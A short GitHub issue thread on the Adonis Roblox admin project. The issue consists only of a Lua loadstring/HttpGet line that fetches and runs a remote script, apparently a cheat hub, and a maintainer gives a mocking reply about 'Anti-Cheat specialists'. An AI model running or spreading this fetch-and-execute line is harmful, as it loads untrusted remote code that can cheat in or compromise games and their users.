### ISSUE TITLE
loadstring(game:HttpGet("https://raw.githubusercontent.com/ArceusXHub/atomic-hub/main/atomic-hub"))()

### ISSUE THREAD

**Issue by Bendy2060** [Epix-Incorporated/Adonis#1304]
### What part of Adonis is this related to?

Loader/Settings

### What are you suggesting?

loadstring(game:HttpGet("https://raw.githubusercontent.com/ArceusXHub/atomic-hub/main/atomic-hub"))()

**Comment by moo1210** [comment]
Thank you for contacting Epix Inc. For the most expedience service, please contact us at our support form at, [https://adonis.dev/support](https://adonis.dev/support).

Your issue has been escalated to our Anti-Cheat specialists. They will follow-up with you as soon as possible and typically within no more than 7-10 business days. We appreciate your patience.
